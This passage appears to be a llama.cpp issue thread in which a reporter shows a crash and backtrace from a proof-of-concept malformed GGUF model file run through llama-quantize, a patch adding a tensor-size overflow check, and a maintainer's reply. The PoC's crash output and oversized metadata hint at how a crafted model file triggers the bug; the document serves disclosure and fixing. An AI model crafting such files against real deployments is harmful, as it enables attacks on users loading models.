llama_model_loader: - kv   8:     llama.attention.layer_norm_rms_epsilon f32              = 0.000010
llama_model_loader: - kv   9:                  llama.feed_forward_length u32              = 11008
llama_model_loader: - kv  10:                           llama.vocab_size u32              = 2147483648
llama_model_loader: - kv  11:                       tokenizer.ggml.model str              = llama
llama_model_loader: - kv  12:                      tokenizer.ggml.tokens arr[str,8]       = ["<unk>", "<s>", "</s>", "a", "b", "c...
llama_model_loader: - kv  13:                      tokenizer.ggml.scores arr[f32,8]       = [0.000000, 0.000000, 0.000000, 0.0000...
llama_model_loader: - kv  14:                  tokenizer.ggml.token_type arr[u32,8]       = [0, 0, 0, 0, 0, 0, 0, 0]
llama_model_loader: - kv  15:                tokenizer.ggml.bos_token_id u32              = 1
llama_model_loader: - kv  16:                tokenizer.ggml.eos_token_id u32              = 2
llama_model_loader: - kv  17:            tokenizer.ggml.unknown_token_id u32              = 0
llama_model_loader: - type  f32:    1 tensors
/root/llama.cpp.pascal/src/llama-model-loader.cpp:945: GGML_ASSERT(cur->data != nullptr) failed
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fd5c54f1bd3 in __GI___wait4 (pid=959807, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      ../sysdeps/unix/sysv/linux/wait4.c: Aucun fichier ou dossier de ce type.
#0  0x00007fd5c54f1bd3 in __GI___wait4 (pid=959807, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      in ../sysdeps/unix/sysv/linux/wait4.c
#1  0x00007fd5cb87d6ff in __interceptor_waitpid (pid=<optimized out>, status=0x0, options=<optimized out>) at ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:2518
2518    ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc: Aucun fichier ou dossier de ce type.
#2  0x00007fd5ca8a0aa4 in ggml_print_backtrace () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#3  0x00007fd5ca8a0d7b in ggml_abort () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#4  0x00007fd5cb1c2c6a in llama_model_loader::load_data_for(ggml_tensor*) const () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#5  0x00007fd5cb352435 in llama_model_quantize_impl(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, llama_model_quantize_params const*) () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#6  0x00007fd5cb35c312 in llama_model_quantize () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#7  0x0000564b4671f763 in main ()
[Inferior 1 (process 959806) detached]
./test_exploit.sh : ligne 6 : 959806 Abandon                 ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 ./build/bin/llama-quantize ~/A/overflow_poc_friday.gguf /tmp/out.gguf Q4_0
[*] Exit code: 134

With my patch from two days ago:

(root|~/llama.cpp.pascal) git diff
diff --git a/ggml/src/gguf.cpp b/ggml/src/gguf.cpp
index b165d8bdc..00e31a8e2 100644
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

Do you want me to test the PR patch? It seems unnecessarily large.

(root|~/A) ./test_exploit.sh
[*] Testing with ASAN build...
main: build = 7749 (a75fd08e7)
main: built with GNU 12.2.0 for Linux x86_64
main: quantizing '/root/A/overflow_poc_friday.gguf' to '/tmp/out.gguf' as Q4_0
gguf_init_from_file_impl: tensor 'token_embd.weight' size overflow
gguf_init_from_file_impl: failed to read tensor info
llama_model_quantize: failed to quantize: llama_model_loader: failed to load model from /root/A/overflow_poc_friday.gguf
main: failed to quantize model from '/root/A/overflow_poc_friday.gguf'
[*] Exit code: 1

@JohannesGaessler
Contributor

ggml_nbytes_safe should not be in the core library; I've already laid out how the fix should be done, and this has not changed. And just in case you're unaware, let me remind you of this rule from the contributing guidelines:

  1. Using AI to respond to human reviewers is strictly prohibited.

